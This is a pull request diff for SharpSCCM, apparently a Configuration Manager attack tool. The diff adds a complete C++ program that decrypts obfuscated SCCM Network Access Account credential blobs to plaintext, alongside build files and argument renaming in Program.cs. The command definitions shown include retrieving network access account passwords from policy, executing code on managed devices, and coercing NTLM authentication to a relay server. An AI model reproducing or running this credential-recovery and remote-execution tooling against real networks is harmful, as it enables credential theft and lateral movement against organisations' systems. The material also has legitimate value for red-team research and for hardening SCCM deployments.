### PR TITLE
Ported Adam Chester's sccmwtf.py research into "get naa" command, removed server/sitecode from required args, and code cleanup

### DIFF
--- a/App.config
+++ b/App.config
@@ -1,6 +1,26 @@
-<?xml version="1.0" encoding="utf-8"?>
+﻿<?xml version="1.0" encoding="utf-8"?>
 <configuration>
     <startup> 
-        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/>
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
     </startup>
+  <runtime>
+    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
+      <dependentAssembly>
+        <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
+        <bindingRedirect oldVersion="0.0.0.0-4.0.6.0" newVersion="4.0.6.0" />
+      </dependentAssembly>
+      <dependentAssembly>
+        <assemblyIdentity name="System.Threading.Tasks.Extensions" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />
+        <bindingRedirect oldVersion="0.0.0.0-4.2.0.1" newVersion="4.2.0.1" />
+      </dependentAssembly>
+      <dependentAssembly>
+        <assemblyIdentity name="System.ValueTuple" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />
+        <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />
+      </dependentAssembly>
+      <dependentAssembly>
+        <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />
+        <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />
+      </dependentAssembly>
+    </assemblyBinding>
+  </runtime>
 </configuration>

--- a/DeobfuscateNAAString/DeobfuscateNAAString.cpp
+++ b/DeobfuscateNAAString/DeobfuscateNAAString.cpp
@@ -1,0 +1,107 @@
+/*
+* Research by Evan McBroom and Chris Thompson (@_Mayyhem)
+* Roger Zander made security recommendations for SCCM based on the claim that NAA credentials could be recovered.
+* Source: https://rzander.azurewebsites.net/network-access-accounts-are-evil/
+* Roger stated that recover was "possible with a few lines of code" but did not provide any code. Here is working code.
+*/
+
+#include <Windows.h>
+#include <stdio.h>
+
+#pragma comment(lib, "Crypt32.lib")
+
+namespace {
+    struct THeaderInfo {
+        DWORD nHeaderLength; // Must be 0x14
+        DWORD nEncryptedSize;
+        DWORD nPlainSize;
+        DWORD nAlgorithm;
+        DWORD nFlag;
+    };
+
+    struct GarbledData {
+        DWORD dwVersion;
+        BYTE  key[40];
+        THeaderInfo header;
+        BYTE  pData[];
+    };
+
+    HRESULT HexDecode(LPCWSTR pwszGarbled, LPBYTE* pbGarbled, LPDWORD nGarbledSize) {
+        if (CryptStringToBinaryW(pwszGarbled, 0, CRYPT_STRING_HEX, nullptr, nGarbledSize, nullptr, nullptr)) {
+            if ((*pbGarbled = reinterpret_cast<LPBYTE>(LocalAlloc(LHND, *nGarbledSize))) != nullptr) {
+                if (CryptStringToBinaryW(pwszGarbled, 0, CRYPT_STRING_HEX, *pbGarbled, nGarbledSize, nullptr, nullptr)) {
+                    return NO_ERROR;
+                }
+            }
+        }
+        return GetLastError();
+    }
+}
+
+namespace DES {
+    HRESULT DecryptBuffer(LPBYTE pbKey, DWORD nKeySize, THeaderInfo* pHeader, DWORD nEncryptedSize, LPBYTE* pbPlain, LPDWORD nPlainSize) {
+        HRESULT succeeded{ false };
+        HCRYPTPROV hProv;
+        if (CryptAcquireContextW(&hProv, nullptr, nullptr, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+            HCRYPTHASH hHash;
+            if (CryptCreateHash(hProv, CALG_SHA, 0, 0, &hHash)) {
+                if (CryptHashData(hHash, pbKey, nKeySize, 0)) {
+                    HCRYPTKEY hKey;
+                    // In our testing pHeader->nAlgorithm was CALG_3DES (e.g. 0x6603)
+                    if (CryptDeriveKey(hProv, pHeader->nAlgorithm, hHash, pHeader->nFlag, &hKey)) {
+                        LPBYTE pData{ reinterpret_cast<LPBYTE>(pHeader) + pHeader->nHeaderLength };
+                        DWORD dwDecryptedLen{ pHeader->nPlainSize };
+                        if (CryptDecrypt(hKey, 0, TRUE, 0, pData, &dwDecryptedLen)) {
+                            *nPlainSize = dwDecryptedLen;
+                            *pbPlain = reinterpret_cast<LPBYTE>(LocalAlloc(LHND, dwDecryptedLen));
+                            memcpy(*pbPlain, pData, dwDecryptedLen);
+                            ZeroMemory(pData, dwDecryptedLen);
+                            succeeded = true;
+                        }
+                        CryptDestroyHash(hKey);
+                    }
+                }
+                CryptDestroyHash(hHash);
+            }
+            CryptReleaseContext(hProv, 0);
+        }
+        return (succeeded) ? NO_ERROR : GetLastError();
+    }
+}
+
+namespace Obfuscation {
+    HRESULT UnobfuscateBuffer(GarbledData* pbGarbled, DWORD nGarbledSize, LPBYTE* pbPlain, LPDWORD nPlainSize) {
+        if (pbGarbled->dwVersion == 0x1389 /* 5001 */) {
+            return DES::DecryptBuffer(pbGarbled->key, sizeof(GarbledData::key), &pbGarbled->header, nGarbledSize - sizeof(GarbledData::dwVersion) - sizeof(GarbledData::key), pbPlain, nPlainSize);
+        }
+        else {
+            return E_FAIL;
+        }
+    }
+}
+
+int wmain(int argc, wchar_t** argv) {
+    if (argc == 2) {
+        // The following implements SMS::Crypto::Obfuscation::UnobfuscateWCharBuffer
+        LPBYTE pbGarbled;
+        DWORD nGarbledSize;
+        if (HexDecode(argv[1], &pbGarbled, &nGarbledSize) == NO_ERROR) {
+            LPBYTE pbPlain;
+            DWORD nPlainSize;
+            if (Obfuscation::UnobfuscateBuffer(reinterpret_cast<GarbledData*>(pbGarbled), nGarbledSize, &pbPlain, &nPlainSize) == NO_ERROR) {
+                printf("Plaintext: %ws\n", pbPlain);
+                //LocalFree(pbPlain);
+            }
+            else {
+                LPWSTR messageBuffer = nullptr;
+                size_t size = FormatMessageW(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, nullptr, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), reinterpret_cast<LPWSTR>(&messageBuffer), 0, nullptr);
+                printf("Error: %ws\n", messageBuffer);
+                LocalFree(messageBuffer);
+            }
+            //LocalFree(pbGarbled);
+        }
+    }
+    else {
+        printf("%ws <hex ciphertext>\n", argv[0]);
+    }
+}

--- a/DeobfuscateNAAString/DeobfuscateNAAString.vcxproj
+++ b/DeobfuscateNAAString/DeobfuscateNAAString.vcxproj
@@ -1,0 +1,151 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{8fac6b27-207e-496f-bac6-dcd5f5228b83}</ProjectGuid>
+    <RootNamespace>DeobfuscateNAAString</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+    <OutDir>$(ProjectDir)$(Configuration)\</OutDir>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(ProjectDir)$(Configuration)\</OutDir>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+    <OutDir>$(ProjectDir)$(Platform)\$(Configuration)\</OutDir>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(ProjectDir)$(Platform)\$(Configuration)\</OutDir>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="DeobfuscateNAAString.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

--- a/DeobfuscateNAAString/DeobfuscateNAAString.vcxproj.filters
+++ b/DeobfuscateNAAString/DeobfuscateNAAString.vcxproj.filters
@@ -1,0 +1,22 @@
+﻿<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="DeobfuscateNAAString.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>

--- a/Program.cs
+++ b/Program.cs
@@ -251,28 +251,28 @@ namespace SharpSCCM
                 var getNetworkAccessAccounts = new Command("naa", "Get network access accounts and passwords from the server policy");
                 getCommand.Add(getNetworkAccessAccounts);
                 getNetworkAccessAccounts.Add(new Option<string>(new[] { "--password", "-p" }, "The password for the specified machine account"));
-                getNetworkAccessAccounts.Add(new Option<string>(new[] { "--machine", "-m" }, "The name of the machine account to register a new device record for"));
-                getNetworkAccessAccounts.Add(new Argument<string>("method", "(machine|cert) Use either a machine account and password or the local client authentication certificate for authentication to the management point (cert method requires local Administrator privileges)"));
+                getNetworkAccessAccounts.Add(new Option<string>(new[] { "--computer", "-c" }, "The name of the computer account to register a new device record for"));
+                getNetworkAccessAccounts.Add(new Argument<string>("method", "(computer|cert) Use either a computer account and password or the local client authentication certificate for authentication to the management point (cert method requires local Administrator privileges)"));
                 getNetworkAccessAccounts.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string method, string machine, string password) =>
+                    (string server, string sitecode, string method, string computer, string password) =>
                     {
                         if (server == null || sitecode == null)
                         {
                             (server, sitecode) = ClientWmi.GetCurrentManagementPointAndSiteCode();
                         }
 
-                        if (method != "machine" && method != "cert")
+                        if (method != "computer" && method != "cert")
                         {
-                            Console.WriteLine("[!] The method argument must be set to a value of \"machine\" or \"cert\"");
+                            Console.WriteLine("[!] The method argument must be set to a value of \"computer\" or \"cert\"");
                         }
 
-                        //else if (method == "machine" && (string.IsNullOrEmpty(machine) || string.IsNullOrEmpty(password)))
+                        //else if (method == "computer" && (string.IsNullOrEmpty(computer) || string.IsNullOrEmpty(password)))
                         //{
-                        //    Console.WriteLine("[!] A machine account name (-m) and password (-p) must be specified for this method");
+                        //    Console.WriteLine("[!] A computer account name (-m) and password (-p) must be specified for this method");
                         //}
                         else
                         {
-                            MgmtPointMessaging.GetNetworkAccessAccounts(server, sitecode, method, machine, password);
+                            MgmtPointMessaging.GetNetworkAccessAccounts(server, sitecode, method, computer, password);
                         }
                     });
 

--- a/Program.cs
+++ b/Program.cs
@@ -21,14 +21,9 @@ namespace SharpSCCM
             try
             {
                 Console.WriteLine();
-                Console.WriteLine(@" _____ _                      _____ _____  _____ ___  ___");
-                Console.WriteLine(@"/  ___| |                    /  ___/  __ \/  __ \|  \/  |");
-                Console.WriteLine(@"\ `--.| |__   __ _ _ __ _ __ \ `--.| /  \/| /  \/| .  . |");
-                Console.WriteLine(@" `--. \ '_ \ / _` | '__| '_ \ `--. \ |    | |    | |\/| |");
-                Console.WriteLine(@"/\__/ / | | | (_| | |  | |_) /\__/ / \__/\| \__/\| |  | |");
-                Console.WriteLine(@"\____/|_| |_|\__,_|_|  | .__/\____/ \____/ \____/\_|  |_/");
-                Console.WriteLine(@"                       | |                               ");
-                Console.WriteLine(@"                       |_|                               ");
+                Console.WriteLine("  _______ _     _ _______  ______  _____  _______ _______ _______ _______");
+                Console.WriteLine("  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |");
+                Console.WriteLine("  ______| |     | |     | |    \\_ |       ______| |______ |______ |  |  |");
                 Console.WriteLine();
 
                 // Gather required arguments
@@ -556,10 +551,10 @@ namespace SharpSCCM
                 var commandLine = new CommandLineBuilder(rootCommand)
                    .UseVersionOption()
                    .UseHelp()
-                   .UseEnvironmentVariableDirective()
-                   .UseParseDirective()
-                   .UseSuggestDirective()
-                   .RegisterWithDotnetSuggest()
+                   //.UseEnvironmentVariableDirective()
+                   //.UseParseDirective()
+                   //.UseSuggestDirective()
+                   //.RegisterWithDotnetSuggest()
                    .UseTypoCorrections()
                    .UseParseErrorReporting()
                    .CancelOnProcessTermination()

--- a/Program.cs
+++ b/Program.cs
@@ -48,9 +48,9 @@ namespace SharpSCCM
                 addDeviceToCollection.Add(new Argument<string>("device-name", "The name of the device you would like to add to the specified collection"));
                 addDeviceToCollection.Add(new Argument<string>("collection-name", "The name of the collection you would like to add the specified device to"));
                 addDeviceToCollection.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string deviceName, string collectionName) =>
+                    (string server, string siteCode, string deviceName, string collectionName) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         MgmtPointWmi.AddDeviceToCollection(wmiConnection, deviceName, collectionName);
                     });
 
@@ -59,9 +59,9 @@ namespace SharpSCCM
                 addCommand.Add(addUserToAdmins);
                 addUserToAdmins.Add(new Argument<string>("user-name", "The domain and user name you would like to grant Full Administrator privilege to (e.g., DOMAIN-SHORTNAME\\USERNAME)"));
                 //addUserToAdmins.Handler = CommandHandler.Create(
-                //    (string server, string sitecode, string userName) =>
+                //    (string server, string siteCode, string userName) =>
                 //    {
-                //        var connection = Database.Connect(server, sitecode);
+                //        var connection = Database.Connect(server, siteCode);
                 //        Database.Query(connection, "SELECT * FROM RBAC_Admins");
                 //    });
 
@@ -71,9 +71,9 @@ namespace SharpSCCM
                 addUserToCollection.Add(new Argument<string>("user-name", "The domain and user name you would like to add to the specified collection (e.g., DOMAIN-SHORTNAME\\USERNAME)"));
                 addUserToCollection.Add(new Argument<string>("collection-name", "The name of the collection you would like to add the specified user to"));
                 addUserToCollection.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string userName, string collectionName) =>
+                    (string server, string siteCode, string userName, string collectionName) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         MgmtPointWmi.AddUserToCollection(wmiConnection, userName, collectionName);
                     });
 
@@ -86,9 +86,9 @@ namespace SharpSCCM
                 execCommand.Add(new Option<string>(new[] { "--relay-server", "-r" }, "The NetBIOS name, IP address, or if WebClient is enabled on the targeted client device, the IP address and port (e.g., 192.168.1.1@8080) of the relay/capture server (default: the machine running SharpSCCM)"));
                 execCommand.Add(new Option<bool>(new[] { "--run-as-system", "-s" }, "Execute code or request NTLM authentication from the specified device's machine account (default: execute as the logged on user)"));
                 execCommand.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string device, string collection, string path, string relayServer, bool runAsSystem) =>
+                    (string server, string siteCode, string device, string collection, string path, string relayServer, bool runAsSystem) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         MgmtPointWmi.Exec(wmiConnection, device, collection, path, relayServer, !runAsSystem);
                     });
 
@@ -100,7 +100,7 @@ namespace SharpSCCM
                 getCommand.AddGlobalOption(new Option<string>(new[] { "--order-by", "-o" }, "An ORDER BY clause to set the order of data returned by the query (e.g., \"ResourceID DESC\") (default: ascending (ASC) order)"));
                 getCommand.AddGlobalOption(new Option<string[]>(new[] { "--properties", "-p" }, "A space-separated list of properties to query (e.g., \"IsActive UniqueUserName\"") { Arity = ArgumentArity.OneOrMore });
                 getCommand.AddGlobalOption(new Option<string>(new[] { "--server", "-mp" }, "The IP address, FQDN, or NetBIOS name of the Configuration Manager management point server to connect to (default: the current management point of the client running SharpSCCM)"));
-                getCommand.AddGlobalOption(new Option<string>(new[] { "--sitecode", "-sc" }, "The three character site code of the Configuration Manager server (e.g., PS1) (default: the sitecode of the client running SharpSCCM)"));
+                getCommand.AddGlobalOption(new Option<string>(new[] { "--site-code", "-sc" }, "The three character site code of the Configuration Manager server (e.g., PS1) (default: the site code of the client running SharpSCCM)"));
                 getCommand.AddGlobalOption(new Option<bool>(new[] { "--verbose", "-v" }, "Display all class properties and their values (default: false)"));
                 Option whereOption = new Option<string>(new[] { "--where", "-w" }, "A WHERE condition to narrow the scope of data returned by the query (e.g., \"Name='cave.johnson'\" or \"Name LIKE '%cave%'\")");
                 whereOption.Name = "whereCondition";
@@ -113,7 +113,7 @@ namespace SharpSCCM
                 getCommand.Add(getApplication);
                 getApplication.Add(new Option<string>(new[] { "--name", "-n" }, "A string to search for in application names (returns all applications where the name contains the provided string"));
                 getApplication.Handler = CommandHandler.Create(
-                    (string server, string sitecode, bool count, bool dryRun, string orderBy, string[] properties, string whereCondition, bool verbose, string name) =>
+                    (string server, string siteCode, bool count, bool dryRun, string orderBy, string[] properties, string whereCondition, bool verbose, string name) =>
                     {
                         if (!string.IsNullOrEmpty(name))
                         {
@@ -123,7 +123,7 @@ namespace SharpSCCM
                         {
                             properties = new[] { "CI_ID", "CI_UniqueID", "CreatedBy", "DateCreated", "ExecutionContext", "DateLastModified", "IsDeployed", "IsEnabled", "IsHidden", "LastModifiedBy", "LocalizedDisplayName", "NumberOfDevicesWithApp", "NumberOfDevicesWithFailure", "NumberOfUsersWithApp", "NumberOfUsersWithFailure", "SourceSite" };
                         }
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         MgmtUtil.GetClassInstances(wmiConnection, "SMS_Application", count, properties, whereCondition, orderBy, dryRun, verbose);
                     });
 
@@ -132,9 +132,9 @@ namespace SharpSCCM
                 getCommand.Add(getClasses);
                 getClasses.Add(new Argument<string>("wmiNamespace", "The WMI namespace to query (e.g., \"root\\CCM\")"));
                 getClasses.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string wmiNamespace, bool count, string whereCondition, string orderBy, bool dryRun, bool verbose) =>
+                    (string server, string siteCode, string wmiNamespace, bool count, string whereCondition, string orderBy, bool dryRun, bool verbose) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, wmiNamespace, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, wmiNamespace, siteCode);
                         MgmtUtil.PrintClasses(wmiConnection);
                     });
 
@@ -142,11 +142,11 @@ namespace SharpSCCM
                 var getClassInstances = new Command("class-instances", "Get information on WMI class instances");
                 getCommand.Add(getClassInstances);
                 getClassInstances.Add(new Argument<string>("wmiClass", "The WMI class to query (e.g., \"SMS_R_System\")"));
-                getClassInstances.Add(new Option<string>(new[] { "--wmi-namespace", "-ns" }, "The WMI namespace to query (e.g., \"root\\CCM\") (default: \"root\\SMS\\site_<sitecode>\")"));
+                getClassInstances.Add(new Option<string>(new[] { "--wmi-namespace", "-ns" }, "The WMI namespace to query (e.g., \"root\\CCM\") (default: \"root\\SMS\\site_<site-code>\")"));
                 getClassInstances.Handler = CommandHandler.Create(
-                    (string server, string sitecode, bool count, string wmiNamespace, string wmiClass, string[] properties, string whereCondition, string orderBy, bool dryRun, bool verbose) =>
+                    (string server, string siteCode, bool count, string wmiNamespace, string wmiClass, string[] properties, string whereCondition, string orderBy, bool dryRun, bool verbose) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, wmiNamespace, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, wmiNamespace, siteCode);
                         if (properties.Length == 0)
                         {
                             verbose = true;
@@ -158,11 +158,11 @@ namespace SharpSCCM
                 var getClassProperties = new Command("class-properties", "Get all properties of a specified WMI class");
                 getCommand.Add(getClassProperties);
                 getClassProperties.Add(new Argument<string>("wmiClass", "The WMI class to query (e.g., \"SMS_R_System\")"));
-                getClassProperties.Add(new Option<string>(new[] { "--wmi-namespace", "-ns" }, "The WMI namespace to query (e.g., \"root\\CCM\") (default: \"root\\SMS\\site_<sitecode>\")"));
+                getClassProperties.Add(new Option<string>(new[] { "--wmi-namespace", "-ns" }, "The WMI namespace to query (e.g., \"root\\CCM\") (default: \"root\\SMS\\site_<site-code>\")"));
                 getClassProperties.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string wmiNamespace, string wmiClass) =>
+                    (string server, string siteCode, string wmiNamespace, string wmiClass) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, wmiNamespace, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, wmiNamespace, siteCode);
                         ManagementObject classInstance = new ManagementClass(wmiConnection, new ManagementPath(wmiClass), new ObjectGetOptions()).CreateInstance();
                         MgmtUtil.PrintClassProperties(classInstance);
                     });
@@ -172,7 +172,7 @@ namespace SharpSCCM
                 getCommand.Add(getCollection);
                 getCollection.Add(new Option<string>(new[] { "--name", "-n" }, "A string to search for in collection names (returns all devices where the device name contains the provided string"));
                 getCollection.Handler = CommandHandler.Create(
-                    (string server, string sitecode, bool count, bool dryRun, string orderBy, string[] properties, string whereCondition, bool verbose, string name) =>
+                    (string server, string siteCode, bool count, bool dryRun, string orderBy, string[] properties, string whereCondition, bool verbose, string name) =>
                     {
                         if (!string.IsNullOrEmpty(name))
                         {
@@ -182,7 +182,7 @@ namespace SharpSCCM
                         {
                             properties = new[] { "CollectionID", "CollectionType", "IsBuiltIn", "LastMemberChangeTime", "LastRefreshTime", "LimitToCollectionName", "MemberClassName", "MemberCount", "Name" };
                         }
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         MgmtUtil.GetClassInstances(wmiConnection, "SMS_Collection", count, properties, whereCondition, orderBy, dryRun, verbose);
                     });
 
@@ -191,7 +191,7 @@ namespace SharpSCCM
                 getCommand.Add(getCollectionMember);
                 getCollectionMember.Add(new Argument<string>("name", "A string to search for in collection names (returns all members of collections with names containing the provided string"));
                 getCollectionMember.Handler = CommandHandler.Create(
-                    (string server, string sitecode, bool count, string[] properties, string whereCondition, string orderBy, bool dryRun, bool verbose, string name) =>
+                    (string server, string siteCode, bool count, string[] properties, string whereCondition, string orderBy, bool dryRun, bool verbose, string name) =>
                     {
                         if (properties.Length == 0 && !verbose)
                         {
@@ -203,7 +203,7 @@ namespace SharpSCCM
                         }
                         else
                         {
-                            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                             MgmtPointWmi.GetCollectionMember(wmiConnection, name, count, properties, orderBy, dryRun, verbose);
                         }
                     });
